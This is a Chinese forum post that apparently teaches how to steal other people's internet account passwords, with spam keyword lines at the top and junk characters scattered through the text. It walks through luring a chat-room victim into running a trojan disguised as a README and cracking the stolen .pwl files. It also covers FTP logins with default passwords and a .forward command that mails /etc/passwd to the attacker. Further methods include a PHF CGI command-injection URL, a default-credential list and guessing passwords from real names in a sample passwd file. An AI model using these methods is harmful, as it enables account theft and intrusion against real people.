天天爱天天做天天做天天吃中文|久久综合给久合久久综合|亚洲视频一区二区三区|亚洲国产综合精品2022

  • 
    
    <delect id="ixd07"></delect>

      汶上信息港

      標(biāo)題: 如何得到別人的上網(wǎng)帳號(hào)和密碼 [打印本頁(yè)]

      作者: 雜七雜八    時(shí)間: 2011-1-12 21:03
      標(biāo)題: 如何得到別人的上網(wǎng)帳號(hào)和密碼
      如何得到別人的上網(wǎng)帳號(hào)和密碼,我在這里介紹幾種弱智方法。
      % Y; V! R% }$ i) v0 c方案一:利用特洛伊木馬得到帳號(hào)。必備工具:NTESPY、PWLVIEW。
      $ G! F1 T( P8 u+ ^3 k  E  m/ E, J優(yōu)點(diǎn):只要對(duì)方運(yùn)行了程序就有80%的成功率,而且不需要任何網(wǎng)絡(luò)入侵知識(shí),只要能熟悉的操作上面兩個(gè)軟件即可。NETSPY是全中文軟件,一看就會(huì)。而PWLVIEW又是弱智操作只要在DOS下輸入PWLVIEW然后按回車即可。成功率高,操作簡(jiǎn)單而且用不了多長(zhǎng)時(shí)間是它最大的優(yōu)點(diǎn),只是......' t' }0 E) K4 A( @1 p1 R
      缺點(diǎn):只有一個(gè),那就是如何讓對(duì)方乖乖的運(yùn)行你的程序。$ y+ g3 k: v' p9 t
      提示:先問(wèn)清你的目標(biāo)和你是不是在一個(gè)城市。
      0 w5 h' r; q5 q( e7 }) L* b實(shí)戰(zhàn)演戲:一天,我在X海聊天室里尋找目標(biāo),遇見(jiàn)了同在北京的色鵝丟丟。我上前打招呼:丟丟好呀。丟丟說(shuō):你好呀。我又說(shuō):XXXXXXX(客套話,先和他拉關(guān)系)對(duì)了,我拿到了一個(gè)新程序,要不要看看?丟丟說(shuō):好呀,寄給我吧。+ a4 ~6 R% i' L' z  q! o+ A
      哈哈,魚上鉤了!先把誘餌程序改個(gè)名,如改成readme之類的東東,然后和一些不相干的東西發(fā)過(guò)去,然后你讓他先運(yùn)行README。在這插一句,有一位大俠使用此法時(shí),竟然把控制端程序和NETSPY的說(shuō)明文件一起發(fā)了過(guò)去,真搞不懂他怎么想的。我對(duì)他說(shuō),你先運(yùn)行README,是中文說(shuō)明。丟丟說(shuō):好...咦,怎么沒(méi)反映呀?(YEAH!)我又說(shuō):那你直接運(yùn)行軟件吧。丟丟說(shuō):好吧...不錯(cuò)...我說(shuō):明天見(jiàn)...開(kāi)始干活,連上他的機(jī)子后,現(xiàn)在C盤里找到了WIN95的目錄WINDOWS。也有可能是WIN95或WIN98,進(jìn)入后查找*.pwl,然后把所有后綴名為PWL的文件都抓過(guò)來(lái),放在你的工具PWLVIEW的子目錄里。在DOS窗口下輸入PWLVIEW然后敲回車,丟丟的上網(wǎng)帳號(hào)和密碼就都顯示出來(lái)了。而且以后如果他上網(wǎng),NETSPY就會(huì)通知你,他就再也逃不出你的手掌心了。就算是他換了密碼,你也能在2分鐘內(nèi)再把他搞定。
      : p6 W$ G5 M9 |) Z: S忠告:你用他的帳號(hào)上網(wǎng)后第一件事就是先去查看他的上網(wǎng)時(shí)間。分析一下他一般幾點(diǎn)上網(wǎng)以避免撞車。
      $ D0 [0 h! }9 d5 r2 Z! a, p方案二:利用ISP的疏忽做文章舉。例用工具:EMAILCRK或網(wǎng)絡(luò)刺客3 [) m- a1 Y8 P
      優(yōu)點(diǎn):沒(méi)什么優(yōu)點(diǎn)) J. K( J5 N8 @: u+ b
      缺點(diǎn):要具體情況具體對(duì)待,太麻煩
      8 i: N' W" U& S1 t; E. W& k5 p% o提示:平時(shí)多多留神。
      ( j( @% v! H& m" z譬如,某個(gè)ISP給你開(kāi)好了帳號(hào),然后又畫蛇添足的給你一個(gè)郵箱,地址是:你的帳號(hào)@xxx.net
      & l# \6 n. L  U8 I密碼和你的上網(wǎng)密碼一樣。也就是說(shuō),只要你能敲開(kāi)郵箱的密碼就一切OK了。
      8 }; {6 A) p+ ]5 e' ^運(yùn)行EMAILCRK或網(wǎng)絡(luò)刺客,套上字典后就等著。一般沒(méi)有XX個(gè)小時(shí)搞不定,不成功的可能性很大,而且破解時(shí)還必須要上網(wǎng)。你的機(jī)子要是快可以開(kāi)上三四個(gè)窗口,套上不同的字典一起破
      . y7 k$ z$ B( i1 \' m方案三:侵入郵局主機(jī)然后把PASS檔抓回來(lái),然后用JOHN或JACK套上字典開(kāi)始破。# {$ @4 A3 a- X3 }; ?
      優(yōu)點(diǎn):一次可以破出好多帳號(hào),而且如果運(yùn)氣好還能拿到ROOT,這個(gè)主機(jī)就要?dú)w你控制了。而且破解時(shí)不用上網(wǎng),可以好幾臺(tái)機(jī)子一起破。
      : O+ ^2 @, F* h( l) x" x( D缺點(diǎn):對(duì)于初學(xué)者有一定困難,尤其是只想拿一個(gè)上網(wǎng)帳號(hào)這樣做恐怕會(huì)得不償失。而且被發(fā)現(xiàn)的可能性很大,情節(jié)嚴(yán)重且性質(zhì)惡劣,一定要慎重對(duì)待。
      % y5 o7 h: ~# W, ^) F$ B5 G$ y8 K8 T由于介紹此類的教學(xué)文章比較多,我就不班門弄斧了。
      ! u4 \& I! {- L  F1 k$ T6 r3 o
      - d, H1 M+ ~" F4 C5 g8 {哈哈,我來(lái)說(shuō)說(shuō)最簡(jiǎn)單的入侵方法。其實(shí)入侵大體的原理相同,主要是利用系統(tǒng)的漏洞(BUG)來(lái)做文章。$ ?$ o; x, q5 n2 M& k/ n4 n1 {
      只不過(guò)有的網(wǎng)站漏洞難找有的好找而已。一個(gè)好的黑客,就是要能很快的發(fā)現(xiàn)漏洞并加以利用。下面我給大家舉一個(gè)小栗子。, ^8 [/ p5 x, j/ X
      有一天,我去XX熱線申請(qǐng)主頁(yè),發(fā)現(xiàn)那里采用的是機(jī)器自動(dòng)回信,信的大概格式如下:
      # Y9 ?& e2 s' v1 j7 @& H. l) Z8 H1 b, u' J
      ------------------------------
      ! ]; c. T8 X7 b# R; W9 c6 n$ f5 }% d0 G  l! l; |  j. ^! \
      XXX,你好(XX是你在表格上填的名字)' k% ~' g$ V. n! [. j% _# o: J
      你在XX熱線的主頁(yè)空間已開(kāi)通% K$ i! Q6 p2 J
      帳戶名:XXX 密碼:11  ~1 o' ?, `- Q  W) Q" k
      -----------XX熱線+ q0 [# h- ~# S* \4 M6 k! V
      電話:XXXX-XXXXXXXX; L) V; `" @% P: Y6 M
      ------------------------------9 G3 ?  D( [6 D+ n

      , S; _7 |2 P  q. _' O! e3 U' r好了,由于是機(jī)器回信,所以那里所有人的初始密碼都是11,而且該熱線要更改密碼要TELNET到郵局主機(jī)去改,有許多網(wǎng)友并沒(méi)有接觸過(guò)如何T主機(jī),所以他們使用的還是初始密碼11。
      $ `  T7 `9 _0 s: Z+ J. e# p! q- J9 z$ ~5 ^開(kāi)始干活了,打開(kāi)FTP軟件,輸入XX熱線的IP,密碼11,然后挨個(gè)輸入帳戶名。帳戶名可去XX熱線的主頁(yè)空間列表里查看,先試試AAAA,。。。沒(méi)成功,再換一個(gè),AABB。。。還是不行。哈哈,這個(gè)用戶名短,沒(méi)準(zhǔn)能行。輸入AA。。。進(jìn)去了。寄下用戶名然后繼續(xù)試,ABC。。。又成功了,看來(lái)沒(méi)改密碼的人很多呀。試幾個(gè)就行了,現(xiàn)在,你已經(jīng)擁有這些帳戶的控制權(quán)了。
        u) o& l5 [4 N& J. v2 _( O上面的這個(gè)栗子很簡(jiǎn)單,一般象這么大的漏很難找。要侵入一個(gè)稍微象點(diǎn)話的站臺(tái)就要耗費(fèi)你大量的時(shí)間和金錢,而且還未必能成功。即使成功了,你不改它實(shí)在無(wú)趣,改了恐怕會(huì)步馬X的后塵。此人侵入貴陽(yáng)的主機(jī)并把界面換成了一張淫穢圖片。害的自己吃飯不用花錢了。所以我在這里勸大家一句,把這方面的精力放到全心全意為人民服務(wù)上去。實(shí)在不行就去聊天室,看誰(shuí)不聽(tīng)話就炸他,同樣很過(guò)癮的!
      0 |3 D. M; X6 g( y. E# J9 X  
      3 }( T+ c# R6 J1 Z% h7 S& g, |6 H& ]) H8 p: \6 F
                                 如何獲得第一個(gè)帳號(hào)
      5 s; S9 c, N1 B* l/ `. T- J3 c2 \$ D$ ?) ?) W/ ^' E6 h$ ?4 W! Y
      我們這種水平不高的黑客入侵都是先得到系統(tǒng)的一個(gè)有效帳號(hào),進(jìn)入后再利用系統(tǒng)BUG得到ROOT權(quán)限或想辦法得到SHADOW再解密.無(wú)論是利用系統(tǒng)漏洞還是得到SHADOW都是有一定規(guī)律可尋的,通常你到一些黑客站點(diǎn)找到對(duì)應(yīng)系統(tǒng)相應(yīng)版本的EXPLOIT編譯后執(zhí)行就行了.我感覺(jué)最困難的是獲得第一個(gè)有效的帳號(hào),有時(shí)侯費(fèi)盡力氣也得不到,后來(lái)總算是積累了一些經(jīng)驗(yàn),想寫出來(lái)和大家交流一下,希望能拋磚引玉,請(qǐng)高手們把更好的方法告訴我.
      % [; _, w0 P8 g7 y  Q
      # Q& z7 L0 L$ t4 I% }確定了目標(biāo)以后,我通常是先用匿名FTP去看一下,許多網(wǎng)站都開(kāi)匿名FTP,帳號(hào)用ANONYMOUS或是FTP,密碼用一個(gè)EMAIL帳號(hào)(當(dāng)然是假的),進(jìn)入后到/etc目錄下把PASSWD拿回來(lái),一般情況下都是一份很不全的名單,只有幾個(gè)系統(tǒng)帳號(hào),那就算白來(lái)了:-}但有的時(shí)候會(huì)有比較傻的管理員把一些普通帳號(hào)放進(jìn)去,這就是很重要的信息,雖然只有帳號(hào)沒(méi)有密碼,但畢竟邁出了第一步.如果FTP主目錄是drwxr-xr-x,做一個(gè).foward文件傳上去,在UNIX下的命令應(yīng)該是echo"| /bin/cat /etc/passwd|sed 's/^/ /'|/bin/mail me@my.e-mail.addr" > .forward然后給匿名用戶寫一封信,它會(huì)把PASSWD發(fā)給你。
      7 ~5 ]# O/ q6 Q6 j
      1 y& g+ P* O/ p如果目標(biāo)沒(méi)有匿名FTP,就通過(guò)WWW訪問(wèn)它的主頁(yè),看看上面有什么信息,例如通過(guò)一些聯(lián)系人的EMAIL你就可以發(fā)現(xiàn)一些帳號(hào),有的網(wǎng)頁(yè)上甚至列出了EMAIL通訊錄,這對(duì)黑客來(lái)講就是無(wú)價(jià)之寶.把這些帳號(hào)記下來(lái),非常有用.  i% ?! Y* ~4 C- _
      ; }) z5 S" y' }. S
      以上幾個(gè)方法都不行的話,那就試試PHF查詢.在瀏覽器的地址欄輸入http://攻擊目標(biāo)/cgi-bin/phf/?Qalias=x%0acat%20/etc/passwd如果成功的話會(huì)顯示出PASSWD來(lái),但是成功率極低:-<   t8 b; A0 H8 |, Y* [% x

      7 _6 y0 ?9 n6 e; n還可以利用目標(biāo)的FINGER功能來(lái)積累帳號(hào),如利用HAKTEK(一種掃描器)來(lái)監(jiān)視目標(biāo),一旦有人登陸該主機(jī)就會(huì)報(bào)告給你.但這種方法的缺點(diǎn)就是浪費(fèi)時(shí)間,如果你是自己花錢上網(wǎng)的話可就要出血了!: T, w+ z5 h; H) f0 O

      ; K: d* I* y5 k/ G很有可能以上的方法都不行,那只好使出我的看家本事了-------猜!!!有一些系統(tǒng)默認(rèn)的帳號(hào),例如:/ R6 O8 U/ `* w0 D8 m) E# }: a

      4 X! Z4 `6 _$ e/ d+ H$ A帳號(hào)     密碼
      % l+ {3 p( e% B( b----------- ----------------
      . D/ m7 f8 W$ c/ g+ }root    root' d5 G! _/ K8 K4 Q" f
      sys     sys/system/bin" S( i" Z1 Z4 S, k- A
      bin     sys/bin4 [3 e) k. s- }: O$ w% S8 n
      mountfsys  mountfsys
      / q3 B1 s- _, i) @0 }# H, xadm     adm6 t* x1 P0 k8 `- U: p* S
      uucp    uucp. W) R! I5 k6 w* O; K6 q
      nuucp    anon
      7 p* Q" T0 t0 B( l7 T+ c! P4 wanon    anon
      $ U% {, n, |4 Z# D$ e9 quser    user
      1 q8 X& h3 J0 k8 q0 S7 lgames    games" c7 Y3 o! c- _3 m& A
      install   install
      ' ?& V" ~, K3 q) Qreboot   給 "command login" 用的
      ( d, ~* U! \' S3 Z1 A9 ?demo    demo
      / B) _" h2 N8 }4 _$ o( t( f: d; \umountfsys umountfsys
      4 d6 ~* ~6 v' A5 g) S6 }& k  Ssync     sync7 k* m3 S* ~' u1 }# g: ^
      admin    admin
      2 q$ E; X- Y) n; G* \: Rguest    guest8 i# R8 i$ j$ J/ P+ a# }8 ?9 @
      daemon   daemon
      - y3 ]8 I/ _* e- w/ y2 B. |* R1 \________________________________________________________________; y4 @9 O" k6 ?3 X

      . C3 j1 q' Z3 p有些管理員忘記把他們改掉,那你就發(fā)財(cái)了!
      7 m  r# V. Z$ s/ b# ]5 w: u0 `" {/ {9 V8 T) Y' n' l
      另外還有一些習(xí)慣性帳號(hào)如:test,www,html,web,oracle,setup,sybase,john,tom等也都應(yīng)該試一試.1 A8 P/ U9 M- \: g1 J% `

      ; P+ }" N' O$ z. d  S+ K只有帳號(hào)還不能進(jìn)入系統(tǒng),但有了帳號(hào)搞密碼就容易一些了,主要辦法還是猜.如果是通過(guò)PASSWD知道帳號(hào)的那你應(yīng)該會(huì)發(fā)現(xiàn)該用戶的許多信息,例如:0 Y! ~& }9 M; x
      . C# H  u7 Z+ ]$ Q8 f% g
      .........
      ( @6 W5 z& w/ J: i6 p  \7 T( V5 z2 D/ C1 ]5 f7 O/ y4 J' F
      xlguo:x:263:50:Guo xiaolin:/usr/xlguo:/bin/sh
      * c2 X3 @1 o% ^! u3 [! C9 p0 Z* ^& X" l5 K4 H
      qingyuan:x:275:50::/usr/qingyuan:/bin/sh
      8 D# t# ~2 v. j( Y- [
      ! q& t1 s( T2 A, }$ |/ h# |hjhuang:x:278:50:Huang Haijun:/usr/hjhuang:/bin/sh3 @5 o% \. l: W) ?' K3 w0 v
      $ \2 K4 w1 I* m1 J) H
      smlian:x:282:50:Mr. Lan Shumin:/usr/smlian:/bin/sh1 e0 ~. r9 {  x+ d9 ~* f

      $ N" p) V! i* k5 P  e3 ?/ |kyc:x:293:50:Department of Science & Technology:/usr/kyc:/bin/sh9 P, I2 x, y( ?% |5 w
      / M# P5 M6 Q+ |+ ~+ D; U9 D
      brlu:x:300:50:Lu Baoren:/usr/brlu:/bin/sh6 D2 m1 `# q; @# ]! z5 Y* M8 O7 t

      ( o' c4 F2 t2 F; z& ptide:x:301:50:Wang XinYi:/usr/tide:/bin/sh* S- U5 p# e% \% b: }9 }1 ]/ V3 c
      ; z5 v6 {0 i; ~2 o
      ............, e4 T, l2 [0 ~7 P
      $ o% ~" p  H! e; l
      這是一部分PASSWD,從這兒我們可以得到七個(gè)帳號(hào),注意每一行的第五項(xiàng),那是該用戶的真實(shí)姓名,對(duì)!就用它來(lái)做密碼試.成功率還是比較高的.0 T) h6 p- j+ P
      2 z) D" F! F3 x1 F" l0 v4 F
      如果是用其他方法獲得帳號(hào)的,就用FINGER查詢來(lái)獲得相關(guān)信息.例如知道一個(gè)帳號(hào)support,我們就用網(wǎng)絡(luò)刺客II里的FINGER項(xiàng)來(lái)偵察support@xxx.xxx.xxx會(huì)獲得很多該帳號(hào)的信息例如真名實(shí)姓,電話號(hào)碼等就用這些做密碼來(lái)猜">如果是用其他方法獲得帳號(hào)的,就用FINGER查詢來(lái)獲得相關(guān)信息.例如知道一個(gè)帳號(hào)support,我們就用網(wǎng)絡(luò)刺客II里的FINGER項(xiàng)來(lái)偵察support@xxx.xxx.xxx會(huì)獲得很多該帳號(hào)的信息例如真名實(shí)姓,電話號(hào)碼等就用這些做密碼來(lái)猜.& D( l- x/ P* I. `& J$ d+ Q0 }9 m2 L/ j
      ( D8 I# k1 }* f; g; r; x% _
      當(dāng)然最可能的密碼還是帳號(hào)本身和一些帳號(hào)的變形,如帳號(hào)是john,密碼可能是nhoj,john123,john888等.或是一些簡(jiǎn)單數(shù)字.總之是要費(fèi)一番工夫來(lái)猜的.- w; W+ j$ h/ Z$ |
      0 M* x5 s" Z/ |' D2 ~
      如果還猜不出密碼,只好用LETMEIN之類的東西來(lái)猜,字典一定要好.否則,你的電話費(fèi)就要.....而且這種方法比較危險(xiǎn),還是不用為好.5 ?) K5 Z5 t- y2 ?* `

      2 c; g0 N- c+ {- h$ ~7 Z0 w7 }最后實(shí)在不行還有一種比較卑劣的手段,就是給該網(wǎng)站的網(wǎng)管寫封信,想辦法騙他執(zhí)行特洛伊木馬,然后再.......算了,不說(shuō)了.
      0 |2 G0 W& D7 s4 q% U: j3 ]* a, w4 j" q* T
      你可能發(fā)現(xiàn)以上這些方法都不能百分之百的成功,或者說(shuō)成功率是比較低的,因?yàn)槲乙膊恢栏玫姆椒?但我感到一定有一種更好的方法,希望有高手見(jiàn)到此文能告訴我.
      % v) c# {& R0 c( Q
      7 I1 L0 l+ b, k5 `5 }$ x




      歡迎光臨 汶上信息港 (http://www.vancelump.com/) Powered by Discuz! X3.5